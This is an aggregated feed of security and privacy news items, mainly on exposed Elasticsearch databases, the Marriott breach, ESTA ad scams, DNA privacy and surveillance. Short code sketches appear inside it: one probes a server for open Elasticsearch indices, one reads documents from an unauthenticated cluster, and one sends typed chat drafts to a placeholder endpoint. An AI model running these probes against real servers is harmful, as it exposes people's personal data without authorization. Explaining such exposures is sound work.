Misconfigured ElasticSearch Servers Exposed Private Data of over 82 Million Users. A warning has been issued by Bob Diachenko, a HackenProof security researcher, informing users in the US that around 73 gigabytes of data were identified in a “regular security audit” of publicly accessible servers using the Shodan IoT search engine. According to the researcher, […]


Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Security experts at HackenProof are warning that open Elasticsearch instances have exposed the data of over 82 million users in the United States.


Elasticsearch is a search engine built on the free and open-source information retrieval library Lucene. Developed in Java and released as open source, it is used by many organizations worldwide.

Experts discovered 73 gigabytes of data during a regular security audit of publicly available servers. Using the Shodan search engine, they identified three IPs associated with misconfigured Elasticsearch clusters.

“A massive 73 GB data breach was discovered during a regular security audit of publicly available servers with the Shodan search engine.” reads a blog post published by HackenProof.

“Prior to this publication, there were at least 3 IPs with the identical Elasticsearch clusters misconfigured for public access.”
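
The “misconfigured for public access” part is depressingly easy to verify: an Elasticsearch node with no authentication answers plain HTTP on its default port 9200, and its REST API will enumerate indices for anyone who asks. Below is a sketch of that kind of probe against a hypothetical address; only ever point it at systems you are authorized to test:

    import json
    import urllib.request

    HOST = "203.0.113.10"  # hypothetical IP, e.g. surfaced by a Shodan query

    def probe_elasticsearch(host, port=9200):
        # On an open cluster these unauthenticated requests simply succeed.
        base = "http://{}:{}".format(host, port)
        with urllib.request.urlopen(base + "/", timeout=5) as resp:
            info = json.load(resp)
        print("cluster:", info.get("cluster_name"),
              "version:", info.get("version", {}).get("number"))
        # _cat/indices lists every index with its document count and size on disk.
        with urllib.request.urlopen(base + "/_cat/indices?v", timeout=5) as resp:
            print(resp.read().decode())

    probe_elasticsearch(HOST)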

The first IP, discovered by the experts on November 14, contained the personal information of 56,934,021 U.S. citizens (name, email, address, state, zip, phone number, IP address, plus employer and job title).

Experts discovered a second index in the same archive that contained more than 25 million records with more detailed information (name, company details, zip address, carrier route, latitude/longitude, census tract, phone number, web address, email, employee count, revenue figures, NAICS codes, SIC codes, etc.).


Overall, HackenProof says (PDF), the unprotected Elasticsearch instances exposed a total of 114,686,118 records, and 82,851,841 people were impacted by this data breach.

At this time it is not clear who owns the exposed Elasticsearch instances; experts speculate that Data & Leads Inc. could be the data source.

Experts attempted to notify the company of the incident, but they did not receive any reply. The company website was taken offline just after the publication of the report.

It is not possible to determine how long the data remained exposed online; the good news is that the huge trove of data is no longer available.

“While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.” continues the blog post.

“Moreover, shortly before this publication Data & Leads website went offline and now is unavailable.”

In September, security experts from the firm Kromtech discovered 4,000 compromised instances of the open-source analytics and search tool Elasticsearch that were running PoS malware.

In early 2017, the number of internet-accessible Elasticsearch installs was roughly 35,000.

In July, the security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server.

Unprotected Elasticsearch instances are a gift for hackers and cybercriminals, who can compromise them by installing malware and gaining full administrative privileges on the underlying servers.

Pierluigi Paganini


The Digital Deciders and The Future of Internet

Recently, the nonpartisan think tank New America published a report called “The Digital Deciders” or “how a group of often overlooked countries could hold the keys to the future of the global Internet.” The authors of the report are Robert Morgus, Jocelyn Woolbright and Justin Sherman. The purpose of this thorough and comprehensive report is […]


Massive Marriott Breach Underscores Risk of Overlooking Data Liability

The Marriott breach underscores how companies fail to price in the risk of poor data security. In the age of GDPR, that could be an expensive failure. 


Marriott hotel data breach: Sensitive data of 500 million guests stolen

By Waqas

Marriott has announced that it has suffered a massive data breach after attackers hacked its guest reservation system at Starwood hotels, a group of hotels the company took over in 2016 – These hotels include Sheraton, St. Regis, Westin and W Hotels. The breach was discovered last week after Marriott’s internal security tool alerted the company regarding an attempt to access the […]


Companies ‘Can Sack Workers For Refusing To Use Fingerprint Scanners’

Businesses using fingerprint scanners to monitor their workforce can legally sack employees who refuse to hand over biometric information on privacy grounds, the Fair Work Commission has ruled. From a report: The ruling, which will be appealed, was made in the case of Jeremy Lee, a Queensland sawmill worker who refused to comply with a new fingerprint scanning policy introduced at his work in Imbil, north of the Sunshine Coast, late last year. Fingerprint scanning was used to monitor the clock-on and clock-off times of about 150 sawmill workers at two sites and was preferred to swipe cards because it prevented workers from fraudulently signing in on behalf of their colleagues to mask absences. The company, Superior Woods, had no privacy policy covering workers and failed to comply with a requirement to properly notify individuals about how and why their data was being collected and used. The biometric data was stored on servers located off-site, in space leased from a third party. Lee argued the business had never sought its workers' consent to use fingerprint scanning, and feared his biometric data would be accessed by unknown groups and individuals.


Industry reactions to the enormous Marriott data breach

On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database in the United States. Marriott engaged security experts to help determine what occurred. Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, …


Marriott Says 500 million Starwood Guest Records Stolen in Massive Data Breach

An anonymous reader writes: Starwood Hotels has confirmed its hotel guest database of about 500 million customers has been stolen in a data breach. The hotel and resorts giant said in a statement filed with U.S. regulators that the "unauthorized access" to its guest database was detected on or before September 10 -- but may have dated back as far as 2014. "Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014," said the statement. "Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it." Specific details of the breach remain unknown. We've contacted Starwood for more and will update when we hear back. The company said that it obtained and decrypted the database on November 19 and "determined that the contents were from the Starwood guest reservation database." Some 327 million records contained a guest's name, postal address, phone number, date of birth, gender, email address, passport number, Starwood's rewards information (including points and balance), arrival and departure information, reservation date, and their communication preferences.


Data Breach Exposes Records of 114 Million U.S. Citizens, Companies

A massive database holding more than 114 million records of U.S. citizens and companies was discovered sitting online unprotected due to a misconfigured search server, a data leak that is estimated to affect about 83 million people.


Facebook Mulled Charging for Access to User Data

Facebook on Wednesday said it considered charging application makers to access data at the social network.

Such a move would have been a major shift away from the policy of not selling Facebook members' information, which the social network has stressed in the face of criticism alleging it is more interested in making money than protecting privacy.



Dunkin Donuts Perks loyalty data breach: Change your password

By Waqas

Dunkin Donuts says it has suffered a data breach in which customer data of its DD Perks loyalty program may have been stolen – The DD Perk is a reward program for the company’s regular customers. According to a now-inaccessible security advisory, Dunkin Donuts stated that the data breach was initially detected on October 31st forcing it to […]

This is a post from HackRead.com Read the original post: Dunkin Donuts Perks loyalty data breach: Change your password

Hackers targeted Dell customer information in attempted attack

Earlier this month, hackers attempted to breach Dell's network and obtain customer information, according to the company. While it says there's no conclusive evidence the hackers were successful in their November 9th attack, it's still possible they obtained some data.

Via: The Verge

Source: Dell (1), (2)

Dell resets all customer passwords after security breach

By Waqas

The computer technology giant Dell has announced on Wednesday that it has suffered a potential security breach in which hackers attempted to steal customer data from its website Dell.com. The incident took place on November 9th when Dell detected and disrupted an attack aimed at the personal data of its customers including names, email addresses, and […]

This is a post from HackRead.com Read the original post: Dell resets all customer passwords after security breach

Keeping data swamps clean for ongoing GDPR compliance

The increased affordability and accessibility of data storage over recent years can be both a benefit and a challenge for businesses. While the ability to stockpile huge volumes and varieties of data can deliver previously unattainable intelligence and insight, it can also result in ‘data sprawl’, with businesses unclear of exactly what information is being stored, where it’s being held, and how it’s being accessed. The introduction of the General Data Protection Regulation (GDPR) in … More

The post Keeping data swamps clean for ongoing GDPR compliance appeared first on Help Net Security.

Blog | Avast EN: UK and Amsterdam Fine Uber £900,000 | Avast

The UK’s Information Commissioner’s Office (ICO) and the Dutch Data Protection Authority (DPA) have each levied fines on international car service Uber to the tune of a collective £900,000. The fines were imposed, in the words of the ICO, for “failing to protect customers’ personal information during a cyberattack” as well as for allowing its system to be hit by an “avoidable” security problem.



Blog | Avast EN

Real Life Ads Are Taking Scary Inspiration From Social Media

Advertisements in the real world are becoming more technologically sophisticated, integrating facial recognition, location data, artificial intelligence, and other powerful tools that are more commonly associated with your mobile phone. Welcome to the new age of digital marketing. From a report: During this year's Fashion Week in New York, a digital billboard ad for New Balance used A.I. technology to detect and highlight pedestrians wearing "exceptional" outfits. A billboard advertisement for the Chevy Malibu recently targeted drivers on Interstate 88 in Chicago by identifying the brand of vehicle they were driving, then serving ads touting its own features in comparison. And Bidooh, a Manchester-based startup that admits it was inspired by Minority Report, is using facial recognition to serve ads through its billboards in the U.K. and other parts of Europe as well as South Korea. According to its website, Bidooh allows advertisers to target people based on criteria like age, gender, ethnicity, hair color, clothing color, height, body shape, perceived emotion, and the presence of glasses, sunglasses, beards, or mustaches. We've been on this path for at least a decade, since the New York Times reported that some digital billboards were equipped with small cameras that could analyze a pedestrian's facial features to serve targeted ads based on gender and approximate age. Things have progressed as you'd expect: In 2016, another Times report described how Clear Channel Outdoor Americas had partnered with companies including AT&T to track people via their mobile phones. The ads could determine the gender and average age of people passing different billboards and determine whether they visited a store after seeing an ad.

Read more of this story at Slashdot.

ESTA registration websites still lurk in paid ads on Google

Google has taken direct action against adverts promoting ESTA registration services, often offered by third parties at highly inflated prices. Ads displayed on the Google network shouldn’t display fees higher than what a public source or government charges for products or services. This tightening of the ad leash has taken a remarkable eight years to complete—and we argue it’s not done yet.

What ESTA services are these sites advertising?

The US Visa Waiver program allows citizens of 38 countries to travel visa-free for up to 90 days. This requires an application for eligibility via ESTA (Electronic System for Travel Authorisation). The process is simple and takes only around 10 minutes to fill in an application online. However, many sites have sprung up offering to fill it in on your behalf.

That sounds great!

Sure, everyone hates paperwork, but many people are needlessly paying for a service that does, essentially, nothing. The idea is, you fill in the ESTA questions and submit them to Homeland Security. You then get an authorisation or a rejection. These sites want you to pay them for filling in essentially the exact same form you’d fill in on the USGOV website so they can, in turn, “submit” it on the USGOV submission page. They’ll also often charge a lot more than the standard US$14 submission fee.

That’s…not so great

The flaw here is that if you can submit this information to the third party ESTA registration website, there’s no reason why you couldn’t have just done it yourself on the official USGOV website and saved the additional fee. Once you consider the inflated fees and the fact you might be submitting sensitive personal information and/or payment details to random websites, it quickly becomes an issue.

Why pay $80 instead of $14? It doesn’t really make sense, and this is partly why Google is now cracking down on these sorts of advertisements.

What does Google say about this?

From their Advertising Policies page, Google prohibits the sale of free items. The following is not allowed:

Charging for products or services where the primary offering is available from a government or public source for free or at a lower price

Examples (non-exhaustive list): Services for passport or driving license applications; health insurance applications; documents from official registries, such as birth certificates, marriage certificates, or company registrations; exam results; tax calculators.

Note: You can bundle something free with another product or service that you provide. For example, a TV provider can bundle publicly available content with paid content, or a travel agency can bundle a visa application with a holiday package. But the free product or service can’t be advertised as the primary offering.

Google search results

We thought we’d see what, exactly, is still out there in Google search land. For this, we decided to try common ESTA-related search terms. I went with “ESTA” (naturally), “ESTA questions,” and “ESTA answers.” Here’s what I found:

Search term: ESTA

[Google Trends chart: worldwide popularity of “ESTA” as a search term over time]

A search for the word “ESTA” brings back no adverts in the search results whatsoever. That’s good!

[Screenshot: Google search results for “ESTA” showing no adverts]

Search term: ESTA questions

[Google Trends chart: worldwide popularity of “ESTA questions” as a search term over time]

A search for “ESTA questions” returned one advert, which is still quite good. However, Google said common search terms would no longer fetch ads. Our search above seems pretty basic and still snagged a hit.

[Screenshot: Google search results for “ESTA questions” showing a single advert]

The website featured in the advert doesn’t mention cost on the front page, but does in its Terms of Use. Its basic fee is US$14 for the USGOV application, and US$85 for its listed services. This is arguably the kind of site Google is trying to remove.

Search Term: ESTA answers

[Google Trends chart: worldwide popularity of “ESTA answers” as a search term over time]

“ESTA answers” returned four adverts.

[Screenshot: Google search results for “ESTA answers” showing four adverts]

First result: The same site listed for “ESTA questions” also made top spot under this search term.

Second result: Costs a grand total of US$89, which includes the US$14 Government fee. However, they are upfront about the fact that the service charge won’t apply should you apply directly on the Homeland Security portal. Many sites don’t mention this or hide it away in some terms and conditions.

Third result: Uh, an advert for dust extraction systems. At least there’s definitely no overpriced ESTA fee this time around.

Fourth result: The site lists their fees as US$79, which includes the US$14 Government charge.

We’ve reported to Google all sites whose adverts potentially conflict with its ad policies.

How does Yahoo! stack up?

We looked at Yahoo! to see what we could find in terms of ESTA ads. As far as their Policies for Ads go, the closest thing I could find was “Low quality offers and landing page techniques” from the Oath Ad Policies page:

Services that are offered for free by the government and offered by third parties without adding any additional value to the user, such as green card lotteries
Display and Native ads promoting body branding, piercings or tattoos

This doesn’t really apply here though, as ESTA carries the $14 application fee. On the other hand, there could well be something else I’ve missed in the numerous terms and conditions for advertisers. With that in mind, let’s see what we found.

Searching for “ESTA” brought back no fewer than four ads under the search bar, and seven down the side, with actual search results quite a bit further down the page.

[Screenshot: Yahoo! search results for “ESTA” showing the adverts above and beside the organic results]

In terms of the sites themselves, we got a mixed response with regard to upfront pricing information.

First result: The same site in both “ESTA questions” and “ESTA answers” Google searches returns again, with their now familiar combined fee of $14 and $85.

Second result: No fee information that we could find.

Third result: This site offers a fee of 59 Euros.

Fourth result: We couldn’t find details of pricing, and the FAQ drop-downs didn’t work, so if the information was in there, we couldn’t see it.

Here are the results for the adverts down the right-hand side:

First result: US$89 for services offered.

Second result: No price or FAQs visible, just a form submission process. There was a webchat, however, and we were able to obtain a price that way instead: 89 Euro/US$100 for a US ESTA submission.

[Screenshot: webchat with the ESTA site quoting its 89 Euro/US$100 fee]

Third result: No price visible that we could find.

Fourth result: US$79 plus the US$14 Government fee.

Fifth result: Nothing visible that we could find.

Sixth result: 84 Euros (this includes a “2-year concierge service”).

Seventh result: £37.82, plus the US$14 Government fee and a £1 “overseas transition/calling card fee”.

Looking for travel assistance online?

There are many pitfalls lurking online the moment you go looking for visas, ESTAs, or anything else. It seems baffling to me that people would pay someone else to submit a form to a third party when they have to fill out the form themselves first. Are the extra services promoted by these sites really worth it? Some claim to retain your data “for up to two years” in case you need to reapply. The ESTA is valid for two years, by which point they’d no longer be retaining your information, so I don’t see how this helps.

“Aha”, they’ll say. “We don’t retain the data for two years in case you need to apply for the ESTA again. We retain it in case you’re denied authorisation so you can have another go!”

Well, great, except not really. If you’re denied an ESTA at application time, that’s the end of that:

If a traveler is denied ESTA authorization and his or her circumstances have not changed, a new application will also be denied. A traveler who is not eligible for ESTA is not eligible for travel under the Visa Waiver Program and should apply for a nonimmigrant visa at a U.S. Embassy or Consulate. Reapplying with false information in order to qualify for a travel authorization will make the traveler permanently ineligible for travel to the United States under the Visa Waiver Program

Time for a little DIY

On a similar note, these sites do offer to check that all of your information is correct before submitting. The information you need to supply for an ESTA is basic stuff, though: name, address, passport number, and answers to a series of yes/no questions. It’s not complicated, and you could easily have a friend or relative look it over before submitting it online yourself. “Concierge” services sound good, but there’s so much information online, you shouldn’t have trouble finding a hotel or a taxi service or anything else for that matter.

If you insist on making use of an ESTA application website, keep in mind the above commentary. You should also be wary of sites that aren’t upfront with their pricing. Pay particular attention as to whether they retain a copy of your data and for how long. If they promote the benefit of retaining it for less than two years in case you want to “reapply,” that’s not a great sign. If they refer to the ESTA as a “visa,” also not good. (It isn’t a visa; it’s access to participation in the Visa Waiver Program.)

Keep your passport and your online wits close to hand, and you won’t have any problems. Safe travels!

The post ESTA registration websites still lurk in paid ads on Google appeared first on Malwarebytes Labs.

Kaspersky Lab official blog: Dangerous liaisons: How relatives and friends give away your secrets

Increasingly, modern technologies are helping people’s secrets move into the public domain. There are many such examples, from massive leaks of personal data to the online appearance of private (and even intimate) photos and messages.

This post will leave aside the countless dossiers kept on every citizen in the databases of government and commercial structures — let’s naively assume that this data is reliably protected from prying eyes (although we all know it isn’t). We shall also discard the loss of flash drives, hacker attacks, and other similar (and sadly regular) incidents. For now, we’ll consider only user uploads of data on the Internet.

The solution would seem simple — if it’s private, don’t publish it. But people are not fully in control of all of their private data; friends or relatives can also post sensitive information about them, sometimes without their consent.

Public genes

The information that goes public might be close to the bone, quite literally. For example, your DNA might appear online without your knowledge. Online services based on genes and genealogy, such as 23andMe, Ancestry.com, GEDmatch, and MyHeritage, have been gaining in popularity of late (incidentally, MyHeritage suffered a leak quite recently, but that’s a topic for a separate post). Users voluntarily hand over a biomaterial sample to these services (saliva or a smear from the inside of the cheek), on which basis their genetic profile is determined in the lab. This can be used, for example, to trace a person’s ancestry or establish genetic predisposition to certain diseases.

Confidentiality is not on the agenda. Genealogical services work by matching profiles with ones already in their database (otherwise, family members will not be found). Users occasionally disclose information about themselves voluntarily for the same reason: so that relatives also using the service can find them. An interesting nuance is that clients of such services simultaneously publish the genealogical information of family members who share their genes. These relatives might not actually want people to track them down, especially based on their DNA.

The benefits of genealogical services are undeniable and have resulted in more than a few happy family reunions. However, it should not be forgotten that public genetic databases can be misused.

Brotherly love

At first glance, the problem of storing genetic information in a public database might seem contrived, with no practical consequences. But the truth is that genealogical services and biomaterial samples (a piece of skin, nail, hair, blood, saliva, etc.) can, under certain circumstances, help identify a person, without so much as a photograph.

The reality of the threat was highlighted in a study published in October in the journal Science. One of the authors, Yaniv Erlich, knows firsthand the ins and outs of this industry; he works for MyHeritage, which provides DNA analysis and family tree services.

According to the research, roughly 15 million people to date have undergone a genetic test and had a profile created in electronic form (other data indicate that MyHeritage alone has more than 92 million users). Focusing on the United States, the researchers predicted that public genetic data would soon allow any American with European ancestry (a very large proportion of those so far tested) to be identified by their DNA. Note that it makes no difference whether the subject initiated the test or whether it was done by a curious relative.

To show how easy DNA identification really is, Erlich’s team took the genetic profile of a member of a genome research project, punched it into the database of the GEDmatch service, and within 24 hours had the name of the owner of the DNA sample, writes Nature.

The method has also proved useful to law enforcers, who have been able to solve several dead-end cases thanks to genealogical online services.

How the DNA chain unmasked a criminal

This past spring, after 44 years of unsuccessful searching, a 72-year-old suspect in a series of murders, rapes, and robberies was arrested in California. He was fingered by genealogical information available online.

Lab analysis of biomaterial found at the crime scene resulted in a genetic profile that met the requirements of public genealogical services. Acting as regular users, the detectives then ran the file through the GEDmatch database and compiled a list of likely relatives of the criminal.

All of the matches — more than a dozen in all — were rather distant relatives (none closer than a second cousin). In other words, these people all had common ancestry with the criminal tracing back to the early nineteenth century. As described by the Washington Post, five genealogists armed with census archives, newspaper obituaries, and other data then proceeded to move from these ancestors forward in time, gradually filling in empty slots in the family tree.

A huge circle of distant but living relatives of the perpetrator was formed. Discarding those who did not fit the age, sex, and other criteria, the investigators eventually homed in on the suspect. The detective team then followed him, got hold of an object with a DNA sample on it, and matched it against the material found at the crime scene many years before. The DNA in the samples was the same, and 72-year-old Joseph James DeAngelo was arrested.

The case spotlighted the main benefit of genealogical online public services over the DNA databases of law-enforcement agencies from the viewpoint of investigators. The latter databases store information only on criminals, whereas the former are full of noncriminal users who cast a virtual net over their relatives.

Now imagine that a person is wanted not by the law, but by a criminal group — maybe an accidental witness or a potential victim. The services are public, so anyone can use them. Not so good.

Incriminating tags

DNA-based searches using public services are still fairly niche. Besides creating genetic profiles, a more common way for well-meaning friends and relatives to inadvertently reveal your whereabouts to criminals, law-enforcement agencies, and the world at large is through the ubiquitous practice of tagging photos, videos, and posts on social media.

Even if no ill-wishers are looking for you, these tags can cause embarrassment. Let’s say a carefree lab technician decides to upload photos from a lively staff party and tags everyone in it, including a distinguished professor. The photos immediately and automatically pop up on the latter’s page, undermining his authority in the eyes of students.

A careless post such as this could well lead to dismissal or worse for the person tagged. By the way, any information in social networks can readily form the missing link in the type of search described above, using the public databases of genealogical services.

How to configure tagging

Social networks allow users to control tags and mentions of themselves to varying degrees. For example, Facebook and VK.com let you remove tags from photos published by others and limit the circle of people who can tag you or view materials with tags of you. Facebook users can keep the photos they upload from being seen by friends of people tagged in them, and the VK.com privacy settings let users create a white list of users allowed to view photos with tagged individuals.

Curiously, Facebook not only encourages users to tag friends through hints generated by face-recognition technology (this feature can be disabled in the account settings), but also helps to control their privacy: The social network sends a notification if that technology spots you in someone else’s pic.

As for Instagram, this is what it has to say on the matter: All people, except those you have blocked, can tag you in their photos and videos. That said, the social network lets you choose whether photos with you tagged appear on your profile automatically or only after your approval. You can also specify who can view these posts in your profile.

Despite these functions offering partial control over where and when you pop up, the potential threats are still numerous. Even if you slap a ban on people tagging you in pictures, your name (including a link to the page) might still be mentioned in the description or comments on a photo. That means that the photo is still linked to you, and keeping track of such leaks is near impossible.

With friends like these

Friends and relatives aren’t the only ones who might give away your secrets to third parties. Technologies themselves can also do it, for example, because of the peculiarities of the recommendations system.

VK.com suggests friending people with whom users have mutual friends in the social network. Meanwhile, the Facebook algorithm is far more active in its search for candidates, sometimes recommending fellow members of a particular group or community (school, university, organization). In addition, the friend-selection process employs users’ contact information uploaded to Facebook from mobile devices. However, Facebook does not disclose all of the criteria by which its algorithm selects potential friends, and sometimes you may be left guessing about how it knows about your social connections.

How does this relate to privacy? Here’s an example. In a particularly awkward case, the system recommended unacquainted patients of a psychiatrist to each other — and one of them even divined what they had in common. Health-related data, especially psychiatric, is among the most sensitive there is. Not many would voluntarily agree to it being stored on social media.

Similar cases were cited in a US Senate Committee appeal to Facebook following the Senate hearing in April 2018 on Facebook users’ privacy. In its response, the company did not comment on cases involving patients, listing only the abovementioned sources of information for its friend-suggestion algorithm.

What next?

The Internet already stores far more social and even biological information about us than we might imagine. And one reason we can’t always control it is simply that we don’t know about it. With the advance of new technologies, it is highly likely that the very concept of private data will soon become a thing of the past — our real and online selves are becoming increasingly intertwined, and any secret on the Internet will be outed sooner or later.

However, the problem of online privacy has been raised lately at the level of governments worldwide, so perhaps people can still find a way to fence themselves off from nosy outsiders.



Kaspersky Lab official blog

Lenovo to pay $7.3m for installing adware in 750,000 laptops

By Waqas

In 2015, Beijing-based laptop manufacturer and seemingly reliable technology company Lenovo made headlines when 750,000 of its laptops were found to ship with pre-installed adware called VisualDiscovery, developed by Superfish. The adware played a vital role in compromising online security protections installed by the users on their laptops, accessed financial data and performed man-in-the-middle attacks on private and secure connections […]

This is a post from HackRead.com Read the original post: Lenovo to pay $7.3m for installing adware in 750,000 laptops

Customer Service Agents Might Be Able To See What You’re Typing In Real Time

Gizmodo is warning that some customer service agents might be able to see what you're typing in real time. A reader sent them a transcript from a conversation they had with a mattress company after the agent responded to a message he hadn't sent yet. From the report: Something similar recently happened to HmmDaily's Tom Scocca. He got a detailed answer from an agent one second after he hit send. Googling led Scocca to a live chat service that offers a feature it calls "real-time typing view" to allow agents to have their "answers prepared before the customer submits his questions." Another live chat service, which lists McDonalds, Ikea, and Paypal as its customers, calls the same feature "message sneak peek," saying it will allow you to "see what the visitor is typing in before they send it over." Salesforce Live Agent also offers "sneak peek." This particular magic trick happens thanks to JavaScript operating in your browser and detecting what's happening on a particular site in real time. It's also how companies capture information you've entered into web forms before you've hit submit. Companies could lessen the creepiness by telling people their typing is seen in real time, or could eliminate the send button altogether. So if you don't want to be monitored while you type, put your phone on mute while on hold and copy/paste messages from another document into your customer service chatbox. And in general, be nice to customer service agents. It's not their fault.
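For the technically curious, here is a minimal sketch of how such a "sneak peek" feature can be wired up in the browser. The endpoint URL and element ID are hypothetical placeholders, not taken from any of the chat vendors named above; the point is simply that an ordinary input listener can ship your draft text off-site before you press send.

    // Hypothetical sketch of "real-time typing view": every edit in the
    // chat box is forwarded to a support backend before the visitor
    // presses send. URL and element ID below are made up.
    const chatBox = document.querySelector<HTMLTextAreaElement>("#chat-input");

    if (chatBox) {
      let pending: number | undefined;

      chatBox.addEventListener("input", () => {
        // Debounce so at most one snapshot leaves the page every 300 ms.
        window.clearTimeout(pending);
        pending = window.setTimeout(() => {
          void fetch("https://support.example.com/agent/preview", {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            // The unsent draft leaves the browser right here.
            body: JSON.stringify({ draft: chatBox.value }),
          });
        }, 300);
      });
    }

Nothing about this requires special permissions: if a page can run JavaScript, it can watch its own form fields, which is why the copy/paste advice above actually works.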

Read more of this story at Slashdot.

Urban Massage Data Breach Exposed Sensitive Comments On Its Creepy Clients

An anonymous reader shares a report from TechCrunch: Urban Massage, a popular massage startup that bills itself as providing "wellness that comes to you," has leaked its entire customer database. The London, U.K.-based startup -- now known as just Urban -- left its Google-hosted ElasticSearch database online without a password, allowing anyone to read hundreds of thousands of customer and staff records. Anyone who knew where to look could access, edit or delete the database. It's not known how long the database was exposed or if anyone else had accessed or obtained the database before it was pulled. It's believed that the database was exposed for at least a few weeks. Urban pulled the database offline after TechCrunch reached out. Among the records were thousands of complaints from workers about their clients. The records included specific complaints -- from account blocks for fraudulent behavior and abuse of the referral system to persistent cancelers. But many records also included allegations of sexual misconduct by clients -- such as asking for "massage in genital area" and requesting "sexual services from therapist." Others were marked as "dangerous," while others were blocked due to "police enquiries." Each complaint included a customer's personally identifiable information -- including their name, address, postcode, and phone number.
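As an aside on the mechanics: an ElasticSearch instance left online with security unconfigured answers its standard REST API to anyone who can reach it, which is why researchers keep stumbling over databases like this one. A rough sketch follows; the hostname and index name are hypothetical placeholders, while _cat/indices and _search are real ElasticSearch endpoints (global fetch assumes Node 18+ or a browser).

    // Why a password-less ElasticSearch database is an open book: the
    // stock REST API requires no credentials unless security is enabled.
    // Hostname and index name below are hypothetical.
    const host = "http://exposed-cluster.example.com:9200";

    async function peek(): Promise<void> {
      // Enumerate every index on the cluster.
      const indices = await fetch(`${host}/_cat/indices?format=json`);
      console.log(await indices.json());

      // Pull back a page of documents from one index -- no login step.
      const docs = await fetch(`${host}/customers/_search?size=10`);
      console.log(JSON.stringify(await docs.json(), null, 2));
    }

    void peek();

The fix is equally unglamorous: bind the cluster to a private interface and turn authentication on before it ever faces the internet.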

Read more of this story at Slashdot.

How Surveillance Inhibits Freedom of Expression

In my book Data and Goliath, I write about the value of privacy. I talk about how it is essential for political liberty and justice, and for commercial fairness and equality. I talk about how it increases personal freedom and individual autonomy, and how the lack of it makes us all less secure. But this is probably the most important argument as to why society as a whole must protect privacy: it allows society to progress.

We know that surveillance has a chilling effect on freedom. People change their behavior when they live their lives under surveillance. They are less likely to speak freely and act individually. They self-censor. They become conformist. This is obviously true for government surveillance, but is true for corporate surveillance as well. We simply aren't as willing to be our individual selves when others are watching.

Let's take an example: hearing that parents and children are being separated as they cross the US border, you want to learn more. You visit the website of an international immigrants' rights group, a fact that is available to the government through mass Internet surveillance. You sign up for the group's mailing list, another fact that is potentially available to the government. The group then calls or e-mails to invite you to a local meeting. Same. Your license plates can be collected as you drive to the meeting; your face can be scanned and identified as you walk into and out of the meeting. If, instead of visiting the website, you visit the group's Facebook page, Facebook knows that you did and that feeds into its profile of you, available to advertisers and political activists alike. Ditto if you like their page, share a link with your friends, or just post about the issue.

Maybe you are an immigrant yourself, documented or not. Or maybe some of your family is. Or maybe you have friends or coworkers who are. How likely are you to get involved if you know that your interest and concern can be gathered and used by government and corporate actors? What if the issue you are interested in is pro- or anti-gun control, anti-police violence or in support of the police? Does that make a difference?

Maybe the issue doesn't matter, and you would never be afraid to be identified and tracked based on your political or social interests. But even if you are so fearless, you probably know someone who has more to lose, and thus more to fear, from their personal, sexual, or political beliefs being exposed.

This isn't just hypothetical. In the months and years after the 9/11 terrorist attacks, many of us censored what we spoke about on social media or what we searched on the Internet. We know from a 2013 PEN study that writers in the United States self-censored their browsing habits out of fear the government was watching. And this isn't exclusively an American event; Internet self-censorship is prevalent across the globe, China being a prime example.

Ultimately, this fear stagnates society in two ways. The first is that the presence of surveillance means society cannot experiment with new things without fear of reprisal, and that means those experiments -- if found to be inoffensive or even essential to society -- cannot slowly become commonplace, moral, and then legal. If surveillance nips that process in the bud, change never happens. All social progress -- from ending slavery to fighting for women's rights -- began as ideas that were, quite literally, dangerous to assert. Yet without the ability to safely develop, discuss, and eventually act on those assertions, our society would not have been able to further its democratic values in the way that it has.

Consider the decades-long fight for gay rights around the world. Within our lifetimes we have made enormous strides to combat homophobia and increase acceptance of queer folks' right to marry. Queer relationships slowly progressed from being viewed as immoral and illegal, to being viewed as somewhat moral and tolerated, to finally being accepted as moral and legal.

In the end, it was the public nature of those activities that eventually slayed the bigoted beast, but the ability to act in private was essential in the beginning for the early experimentation, community building, and organizing.

Marijuana legalization is going through the same process: it's currently sitting between somewhat moral, and -- depending on the state or country in question -- tolerated and legal. But, again, for this to have happened, someone decades ago had to try pot and realize that it wasn't really harmful, either to themselves or to those around them. Then it had to become a counterculture, and finally a social and political movement. If pervasive surveillance meant that those early pot smokers would have been arrested for doing something illegal, the movement would have been squashed before inception. Of course the story is more complicated than that, but the ability for members of society to privately smoke weed was essential for putting it on the path to legalization.

We don't yet know which subversive ideas and illegal acts of today will become political causes and positive social change tomorrow, but they're around. And they require privacy to germinate. Take away that privacy, and we'll have a much harder time breaking down our inherited moral assumptions.

The second way surveillance hurts our democratic values is that it encourages society to make more things illegal. Consider the things you do -- the different things each of us does -- that portions of society find immoral. Not just recreational drugs and gay sex, but gambling, dancing, public displays of affection. All of us do things that are deemed immoral by some groups, but are not illegal because they don't harm anyone. But it's important that these things can be done out of the disapproving gaze of those who would otherwise rally against such practices.

If there is no privacy, there will be pressure to change. Some people will recognize that their morality isn't necessarily the morality of everyone -- and that that's okay. But others will start demanding legislative change, or using less legal and more violent means, to force others to match their idea of morality.

It's easy to imagine the more conservative (in the small-c sense, not in the sense of the named political party) among us getting enough power to make illegal what they would otherwise be forced to witness. In this way, privacy helps protect the rights of the minority from the tyranny of the majority.

This is how we got Prohibition in the 1920s, and if we had had today's surveillance capabilities in the 1920s, it would have been far more effectively enforced. Recipes for making your own spirits would have been much harder to distribute. Speakeasies would have been impossible to keep secret. The criminal trade in illegal alcohol would also have been more effectively suppressed. There would have been less discussion about the harms of Prohibition, less "what if we didn't?" thinking. Political organizing might have been difficult. In that world, the law might have stuck to this day.

